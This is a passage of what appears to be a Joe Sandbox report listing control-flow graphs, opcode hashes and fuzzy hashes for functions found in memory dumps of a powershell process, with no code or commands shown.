                              control_flow_graph 670 676ab60-676abaf 676 676abb5-676abba 670->676 677 676abb1 670->677 763 676abbc call 676b226 676->763 764 676abbc call 676b228 676->764 677->676 678 676abc2-676abc6 679 676abd3-676abd8 678->679 680 676abc8-676abd1 678->680 680->679 681 676abdb-676abdf 680->681 682 676ac36-676ac5c 681->682 683 676abe1-676ac33 681->683 690 676ac6e-676ac88 682->690 691 676ac5e-676ac6d 682->691 683->682 692 676ac96 690->692 693 676ac8a-676ac94 690->693 691->690 695 676ac9b-676ac9d 692->695 693->695 697 676ada7-676adbe 695->697 698 676aca3-676acb3 695->698 707 676adc5-676ae20 697->707 699 676acb5 698->699 700 676acbf-676acca call 6766f78 698->700 699->700 700->707 708 676acd0-676ace2 700->708 733 676ae34-676ae5f 707->733 734 676ae22-676ae33 707->734 709 676ace4 708->709 710 676ace9-676ad00 708->710 709->710 714 676ad36-676ad51 710->714 715 676ad02-676ad2e 710->715 722 676ad53-676ad57 714->722 723 676ad6e-676ad89 714->723 715->714 727 676ad5f-676ad67 722->727 728 676ad59-676ad5c 722->728 729 676ad93 723->729 730 676ad8b 723->730 727->723 728->727 729->697 730->729 736 676ae65 733->736 737 676ae61-676ae63 733->737 734->733 738 676ae68-676aebc 736->738 737->738 741 676aec2-676aed1 738->741 742 676afa9-676afc5 738->742 745 676aed4-676aed8 741->745 746 676aee4-676aee8 745->746 747 676aeda 745->747 748 676aef4-676af0a 746->748 749 676aeea 746->749 747->746 751 676af7c-676af8a 748->751 752 676af0c-676af7a 748->752 749->748 755 676af94-676afa3 751->755 752->755 755->742 755->745 763->678 764->678
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8d2749b00c0dfd3f63ef1e97c5e0b6a59d3d77109238ead71c23ef463b8a2da
                              • Instruction ID: 6eef81405d5f9ba632ba1ad1b68dfd9d2fc98760622aac2f3553789242900954
                              • Opcode Fuzzy Hash: c8d2749b00c0dfd3f63ef1e97c5e0b6a59d3d77109238ead71c23ef463b8a2da
                              • Instruction Fuzzy Hash: C1D1B134B002099FC754DF69C854AEEB7F2FF89214F148569E816AB790DB34EC46CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676B9C6 Relevance: .3, Instructions: 324COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 765 676b9c6-676b9fa 770 676b9fc-676ba01 765->770 771 676ba09-676ba13 765->771 770->771 772 676bc35-676bc73 771->772 773 676ba19-676ba27 771->773 790 676bc75-676bc84 772->790 791 676bcce-676bcd3 772->791 774 676ba39 773->774 775 676ba29-676ba37 773->775 777 676ba3b-676ba3d 774->777 775->777 779 676ba3f-676ba41 777->779 780 676ba7d-676ba7f 777->780 781 676ba53 779->781 782 676ba43-676ba51 779->782 783 676ba91 780->783 784 676ba81-676ba8f 780->784 787 676ba55-676ba5b 781->787 782->787 785 676ba93-676ba95 783->785 784->785 788 676ba97-676ba99 785->788 789 676bac9-676bacb 785->789 862 676ba5e call 676bdd0 787->862 863 676ba5e call 676bdc0 787->863 792 676baab 788->792 793 676ba9b-676baa9 788->793 794 676badd 789->794 795 676bacd-676badb 789->795 790->791 800 676bc86-676bc9d 790->800 797 676baad-676bac4 792->797 793->797 799 676badf-676bae1 794->799 795->799 796 676ba64-676ba6c 809 676bb4b-676bb4f 796->809 797->809 801 676bb12-676bb14 799->801 802 676bae3-676bae5 799->802 800->791 826 676bc9f-676bca3 800->826 805 676bb16-676bb1c 801->805 806 676bb32 801->806 807 676baf7 802->807 808 676bae7-676baf5 802->808 810 676bb22-676bb2e 805->810 811 676bb1e-676bb20 805->811 815 676bb34-676bb43 806->815 816 676baf9-676bb10 807->816 808->816 812 676bb51-676bb5a 809->812 813 676bb5d-676bb68 809->813 820 676bb30 810->820 811->820 817 676bb6e-676bbd3 813->817 818 676bc29-676bc32 813->818 815->809 816->809 848 676bbd5-676bbf5 817->848 849 676bbfd-676bc04 817->849 820->815 826->791 828 676bca5-676bca9 826->828 829 676bcd4-676bce8 828->829 830 676bcab-676bccd 828->830 835 676bd07-676bdb8 829->835 836 676bcea-676bd04 829->836 836->835 848->849 849->818 851 676bc06-676bc18 849->851 854 676bc21 851->854 854->818 862->796 863->796
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2378103fb0214866eda863eece91d9ff51b0905afe95bca6550c884dc82fd14e
                              • Instruction ID: 8d7f8c9aed490835a6843f6b1d60c9b969146505304ae18ae8c93a2d0a3ee290
                              • Opcode Fuzzy Hash: 2378103fb0214866eda863eece91d9ff51b0905afe95bca6550c884dc82fd14e
                              • Instruction Fuzzy Hash: 3CC1C035A01219DFCB60DF65C880AE9B7B2EF85704B048929E849DF765DB30ED59CBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676A778 Relevance: .3, Instructions: 286COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 864 676a778-676a79d 866 676a8f6-676a90d 864->866 867 676a7a3-676a7ac 864->867 873 676a914-676a92b 866->873 868 676a7ae-676a7b3 867->868 869 676a7bb-676a7c2 867->869 868->869 870 676a96e-676a997 869->870 871 676a7c8-676a7cc 869->871 882 676a9e0-676a9f7 870->882 883 676a999-676a9c5 870->883 871->873 874 676a7d2-676a7d6 871->874 877 676a932-676a949 873->877 874->877 878 676a7dc-676a7e0 874->878 880 676a950-676a967 877->880 879 676a7e6-676a819 call 676ab60 878->879 878->880 939 676a81b call 676b450 879->939 940 676a81b call 676b440 879->940 880->870 896 676a9fe-676aa15 882->896 903 676a9c7-676a9cb 883->903 904 676a9cd-676a9cf 883->904 895 676a821-676a8bb 899 676a8bd-676a8c6 895->899 900 676a8c9-676a8e7 895->900 906 676aa1c-676aa74 896->906 903->896 903->904 905 676a9d1-676a9dd 904->905 904->906 915 676aa76-676aa8b 906->915 916 676aa8c-676aaa2 906->916 919 676aaa4-676aaa8 916->919 920 676aadf-676aafb 916->920 921 676aaaa-676aab3 919->921 922 676aacb 919->922 931 676ab2c-676ab5e 920->931 932 676aafd-676ab2b 920->932 923 676aab5-676aab8 921->923 924 676aaba-676aac7 921->924 925 676aace-676aade 922->925 927 676aac9 923->927 924->927 927->925 939->895 940->895
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b893361aa93dba8db28a9a3c72fd1c80b57f9fb862eca3714739286d210c27f9
                              • Instruction ID: 5be2899f028699453c72450889155c52e96e66068be6bd0bbda6c88dcbb11939
                              • Opcode Fuzzy Hash: b893361aa93dba8db28a9a3c72fd1c80b57f9fb862eca3714739286d210c27f9
                              • Instruction Fuzzy Hash: C9A1CF317003489FCB14DB79D8546EFB7B6EB84209F14846EE8069BB95DB749C0ACBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676BDD0 Relevance: .2, Instructions: 247COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 942 676bdd0-676bde4 944 676bde6-676bdf2 942->944 945 676bdff-676be0c 942->945 950 676bdf4-676bdfc 944->950 951 676be1c-676be59 944->951 948 676be60-676bf03 945->948 949 676be0e-676be19 945->949 967 676bf90-676bf9b 948->967 968 676bf09-676bf8d 948->968 951->948 998 676bf9d call 676ca58 967->998 999 676bf9d call 676ca48 967->999 970 676bfa3-676bfa7 971 676bfb5-676bfc2 970->971 972 676bfa9-676bfb2 970->972 974 676c0a4-676c0ad 971->974 975 676bfc8-676bfd7 971->975 975->974 976 676bfdd-676c0a1 975->976 998->970 999->970
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bee52e7f65945c20d7b6d13207c44d4173336d381c4bd1708742ba9876f7ba6f
                              • Instruction ID: 279e8958059250101e0ba450767734617790036377d843b11b91cb9bcca5742b
                              • Opcode Fuzzy Hash: bee52e7f65945c20d7b6d13207c44d4173336d381c4bd1708742ba9876f7ba6f
                              • Instruction Fuzzy Hash: C181BE397002149FC744EB79D850AAEFBA7EFC8255B14C06AE90ACB754DF349C4587A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06766C68 Relevance: .2, Instructions: 235COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1000 6766c68-6766c76 1001 6766c84 1000->1001 1002 6766c78-6766c82 1000->1002 1003 6766c89-6766c8b 1001->1003 1002->1003 1004 6766d62-6766d79 1003->1004 1005 6766c91-6766c95 1003->1005 1006 6766d80-6766d97 1004->1006 1005->1006 1007 6766c9b-6766cbc 1005->1007 1016 6766d9e-6766e15 1006->1016 1014 6766cbe-6766cc8 1007->1014 1015 6766cca 1007->1015 1017 6766ccf-6766cd1 1014->1017 1015->1017 1034 6766eed-6766f04 1016->1034 1035 6766e1b-6766e27 1016->1035 1017->1016 1018 6766cd7-6766cde 1017->1018 1020 6766ce4-6766d52 1018->1020 1021 6766ce0 1018->1021 1032 6766d5a-6766d5f 1020->1032 1021->1020 1039 6766f0b-6766f22 1034->1039 1038 6766e2d-6766e2f 1035->1038 1035->1039 1040 6766e31-6766e3b 1038->1040 1041 6766e3d 1038->1041 1046 6766f29-6766f40 1039->1046 1043 6766e42-6766e44 1040->1043 1041->1043 1045 6766e4a-6766e4c 1043->1045 1043->1046 1047 6766e4e-6766e58 1045->1047 1048 6766e5a 1045->1048 1052 6766f47-6766f74 1046->1052 1051 6766e5f-6766e61 1047->1051 1048->1051 1051->1052 1053 6766e67-6766ecf 1051->1053 1068 6766ed7-6766eea 1053->1068
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f1cd3aa5cefc0298ef34f3f492744d0f7d467f2782ba7a6eb569a5b755041e44
                              • Instruction ID: 93d3f21ee79d4724d5bac9e35268c04becd3fae084973309c72bcb0f1a846619
                              • Opcode Fuzzy Hash: f1cd3aa5cefc0298ef34f3f492744d0f7d467f2782ba7a6eb569a5b755041e44
                              • Instruction Fuzzy Hash: C481D0357002059FCB14AF66D4546FE77A6EF84249F04896DE806CF794DB78EC0A8BE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676B450 Relevance: .2, Instructions: 233COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1070 676b450-676b473 1071 676b624-676b63b 1070->1071 1072 676b479-676b47d 1070->1072 1073 676b642-676b6b3 1071->1073 1072->1073 1074 676b483-676b4c9 1072->1074 1091 676b6b5-676b6c1 1073->1091 1092 676b6ed-676b70c call 676b781 1073->1092 1079 676b5f4-676b607 1074->1079 1080 676b4cf-676b4de 1074->1080 1081 676b60e 1079->1081 1085 676b4e1-676b4f2 1080->1085 1081->1071 1120 676b4f5 call 676b9c6 1085->1120 1121 676b4f5 call 676ba7c 1085->1121 1087 676b4fb-676b4ff 1088 676b505-676b56e 1087->1088 1089 676b5df-676b5ee 1087->1089 1109 676b570-676b575 1088->1109 1110 676b57d-676b584 1088->1110 1089->1079 1089->1085 1091->1092 1098 676b6c3-676b6ea 1091->1098 1099 676b712-676b77a 1092->1099 1109->1110 1111 676b58a-676b5c8 call 676ab60 1110->1111 1112 676b609 1110->1112 1118 676b5d1-676b5dc 1111->1118 1112->1081 1118->1089 1120->1087 1121->1087
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31a1709d2509add010ca7e2e317d03226d7600b573622c1a2ad0ce6d46b0f2e0
                              • Instruction ID: 9c6696c45c0d6d982493e03297bda6e97f5cd6acf9b545accf721306581b001b
                              • Opcode Fuzzy Hash: 31a1709d2509add010ca7e2e317d03226d7600b573622c1a2ad0ce6d46b0f2e0
                              • Instruction Fuzzy Hash: 23918474A002489FCB04DFA5C850AEEBBF6EF89304F14812AE815EB751DB349D56CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06768B30 Relevance: .2, Instructions: 231COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1193 6768b30-6768b5b 1196 6768b5d-6768b67 1193->1196 1197 6768b69 1193->1197 1198 6768b6e-6768b70 1196->1198 1197->1198 1199 6768bb2-6768c36 1198->1199 1200 6768b72-6768baf 1198->1200 1211 6768c63-6768c67 1199->1211 1212 6768c38-6768c52 call 6768a58 1199->1212 1214 6768c73-6768c8e 1211->1214 1215 6768c69-6768c6e 1211->1215 1220 6768c57-6768c61 1212->1220 1221 6768c54 1212->1221 1223 6768c90-6768cc8 1214->1223 1224 6768ccd-6768cd4 1214->1224 1217 6768e38-6768e44 1215->1217 1220->1211 1220->1212 1221->1220 1223->1217 1227 6768cda-6768d1a 1224->1227 1235 6768d95-6768db4 1227->1235 1236 6768d1c-6768d1e 1227->1236 1244 6768dbe-6768dc5 1235->1244 1237 6768d30 1236->1237 1238 6768d20-6768d2e 1236->1238 1239 6768d32-6768d34 1237->1239 1238->1239 1239->1235 1241 6768d36-6768d3a 1239->1241 1242 6768d3c-6768d59 1241->1242 1243 6768d5b-6768d83 1241->1243 1251 6768d8b-6768d90 1242->1251 1243->1251 1247 6768dcd-6768e34 1244->1247 1247->1217 1251->1217
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c775f30732d61a01ecd32c8638271c46fa25382ab087e14073cba02e3cd9e7f1
                              • Instruction ID: d419dbc0a4d72255c635fa260899b2c0db865e7657d4bd2fda201f88d91df9b2
                              • Opcode Fuzzy Hash: c775f30732d61a01ecd32c8638271c46fa25382ab087e14073cba02e3cd9e7f1
                              • Instruction Fuzzy Hash: DC81BD35A012049FDB54DF69D890BEE77E2EF89304F10856AE8169F390DB74EC45CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06767E3B Relevance: .2, Instructions: 183COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: efc1094eb9369e28730009b59912a1fbca6f580d4a81784525aa93e8511e19a9
                              • Instruction ID: 2bfab6eb084496827359892d5ea69925bafd3bd0c8ad942920dcdc2d516492a4
                              • Opcode Fuzzy Hash: efc1094eb9369e28730009b59912a1fbca6f580d4a81784525aa93e8511e19a9
                              • Instruction Fuzzy Hash: 62510F34B002099FCB15DF69D810AFFBBB6AF85204B14816AE915DB341DF358D06CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06767AC0 Relevance: .2, Instructions: 178COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 99a5cc952a686db2da196335c113244cc5b07a2bc01f53c8f9e9ddf8d8d3dfa8
                              • Instruction ID: 08874f3d3b664106addbd177f9bb615f9d029ba6e5f4708ab4b699db01a533ab
                              • Opcode Fuzzy Hash: 99a5cc952a686db2da196335c113244cc5b07a2bc01f53c8f9e9ddf8d8d3dfa8
                              • Instruction Fuzzy Hash: AD511631E043488FCB19CFB5C8145FEBBB6AF85254F14826AE811EB381DB748D06CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F150FF Relevance: .2, Instructions: 178COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d4a6bd0fab03dfaca5f25899141a13b2ac3ce7a3ca0f51a32ebda0038d7f786a
                              • Instruction ID: bad7d689510ae3e009382f8ea7f6a377fd4049eb3479fd985f435f92613df3ea
                              • Opcode Fuzzy Hash: d4a6bd0fab03dfaca5f25899141a13b2ac3ce7a3ca0f51a32ebda0038d7f786a
                              • Instruction Fuzzy Hash: 1851D434B012189FCB05DBA4DC50BEFBBB7EB88304F108029D506A77A4DF399C469B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676D580 Relevance: .2, Instructions: 172COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2b4e18634202cd7c1a78e10f7c8cc1690c9f91b79bcd4c55b3a50b3a38e906f
                              • Instruction ID: 647365de9d61cc32113b4fe1b0370f1d119c771f75d22fedd2a41acd6a1860e9
                              • Opcode Fuzzy Hash: b2b4e18634202cd7c1a78e10f7c8cc1690c9f91b79bcd4c55b3a50b3a38e906f
                              • Instruction Fuzzy Hash: 5051AC35B10209DFDB68DF65C454AAEBBB2EF84304F14852EE816AB750DB30AC46CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F177C9 Relevance: .2, Instructions: 171COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 553d34c5c99d233f935c7b8f7a1f0959c7fd7b78a436a2ed885d937fb5200873
                              • Instruction ID: edab8b2e4c0a9f932151f3707498d5b1802de305a9615ee9a94d4eadd4810518
                              • Opcode Fuzzy Hash: 553d34c5c99d233f935c7b8f7a1f0959c7fd7b78a436a2ed885d937fb5200873
                              • Instruction Fuzzy Hash: 0B713735A01214CFEB24EF65D854FAAB7B6FF88310F1481A9D909EB294DB349D41DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F15110 Relevance: .2, Instructions: 168COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d0f8513dccfa2574457ccb5281417e929906db387fbd17e3be58cce1804b3f5a
                              • Instruction ID: 68a9c4aaa248366009392b1f36f1096401b721ce174c31079fe4fe4423cc72b9
                              • Opcode Fuzzy Hash: d0f8513dccfa2574457ccb5281417e929906db387fbd17e3be58cce1804b3f5a
                              • Instruction Fuzzy Hash: C9519134B002189FDB05DBA5DC50BEFBBA7EB88704F108029E506A7794DF399C469B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676D570 Relevance: .1, Instructions: 148COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c70ece639bc9368b2feda5171b4e7292b2d2dacc0e2573a7f9aa16a69eb8a5f
                              • Instruction ID: 3ab86c406d3aa224f9e0f020cf0a6558401181687c8573d527dcf321abbbcc2c
                              • Opcode Fuzzy Hash: 0c70ece639bc9368b2feda5171b4e7292b2d2dacc0e2573a7f9aa16a69eb8a5f
                              • Instruction Fuzzy Hash: DA517A34F20209DFDB68DF66C454AAEB7B2EF88300F148529E816AB350DB70AD41CF81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676B440 Relevance: .1, Instructions: 144COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 645a6c2b485ff9adad2ec8c4f3ba58b7d20202ab85ddb5bdafe8dbe4b8bc9464
                              • Instruction ID: 4f8b3c5f082962081007019906848e51933d433179deb1bfb03b492a628b8b22
                              • Opcode Fuzzy Hash: 645a6c2b485ff9adad2ec8c4f3ba58b7d20202ab85ddb5bdafe8dbe4b8bc9464
                              • Instruction Fuzzy Hash: F5515C74E002089FDB14DFA9C950BEEBBB2EF89344F148129E815AB355DB74AD46CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676E160 Relevance: .1, Instructions: 129COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9a1703dd2e414368e2c19e642228bd04518901a7219aa5018f9dc7d6968481d7
                              • Instruction ID: af8445fd7bdbbbbc585c733b8b0fbd5ab5c9fd95bfe13a371ecf070c3d501137
                              • Opcode Fuzzy Hash: 9a1703dd2e414368e2c19e642228bd04518901a7219aa5018f9dc7d6968481d7
                              • Instruction Fuzzy Hash: 3F41D0387043019FC718AB7AC8189AEBBB6EF85201B04446EE906CB7A1DB34DC05CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06769950 Relevance: .1, Instructions: 112COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5cef2c04cdad97b19506f3673e3df0d115a40925da965806733842bda5a1df1f
                              • Instruction ID: 10091788d3a5e2f5fba0372f5abcdd58d609510e6a5bdb1ff0f5ccee5e8f9382
                              • Opcode Fuzzy Hash: 5cef2c04cdad97b19506f3673e3df0d115a40925da965806733842bda5a1df1f
                              • Instruction Fuzzy Hash: A441AE35B052058FCB05EB75C5186ED7BF2EF89205F0544ADE802EB795DB389D09CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676CA58 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 836530c68bdeeb9a3de54a271001b03d96395d2d86c2805d40ef36ed04e46a51
                              • Instruction ID: c4e6d4de1bc5687535b43f1373defd3991706acc02db533e2c5d2a65890772c3
                              • Opcode Fuzzy Hash: 836530c68bdeeb9a3de54a271001b03d96395d2d86c2805d40ef36ed04e46a51
                              • Instruction Fuzzy Hash: 74416671E00249DFCB55CFA5C480A9EBBB2FF88304F14C969E809AB714DB70A949CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676D65A Relevance: .1, Instructions: 105COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db0cf3affba232b1b4a02619c4c19d8d6e33d318e052e6f95cb99e3c4bd4fa38
                              • Instruction ID: 1d3dc1f66e5a4726de0d351d1193769e5e3a38fa244c92595853f59516ae5d40
                              • Opcode Fuzzy Hash: db0cf3affba232b1b4a02619c4c19d8d6e33d318e052e6f95cb99e3c4bd4fa38
                              • Instruction Fuzzy Hash: 78414D34F20209DFDB68DF62D454AAEB7B2EF84345F108029ED01AB250DB71AC42CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676B781 Relevance: .1, Instructions: 105COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 37e5e461529145d4e2596618e996e3549d9e2b548f6396b56abced581346d63c
                              • Instruction ID: bec4f7bf1f118da05cddc00c005491c38cfb1726a3c67c88ad7b8ddc839aa608
                              • Opcode Fuzzy Hash: 37e5e461529145d4e2596618e996e3549d9e2b548f6396b56abced581346d63c
                              • Instruction Fuzzy Hash: E6210339B043045BCB159A3698145FEBBAADFC6614B04846FE805CBA51DF38880AC7E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F15FF0 Relevance: .1, Instructions: 103COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c11ecd35e9a79ff6bc52ab8bb606fc08e5f9132fa978feca72c83fb1e50a6daa
                              • Instruction ID: fa428ced5fc6062d7a1db9d2c90dd6a2d80aa3e4b9994dbb8b1f681fb5dc8256
                              • Opcode Fuzzy Hash: c11ecd35e9a79ff6bc52ab8bb606fc08e5f9132fa978feca72c83fb1e50a6daa
                              • Instruction Fuzzy Hash: 72419C74E002099FDB54EFB0D451AAEB776EF84304F108939D806AB381DF38A845CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06767FB8 Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 54404b6ab26f52b9fda3b0f99bce5adf60f814a900f8eb000ac54260f74259d5
                              • Instruction ID: 31f83bd9ec29c6b92a77b1699a6165132bed11e412ee7837d2f286f73e13431a
                              • Opcode Fuzzy Hash: 54404b6ab26f52b9fda3b0f99bce5adf60f814a900f8eb000ac54260f74259d5
                              • Instruction Fuzzy Hash: 4531C535701205AFD704AF3AD8406AEB7A2FB85620F118229D9259F3D4EF35DD06CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676A169 Relevance: .1, Instructions: 95COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
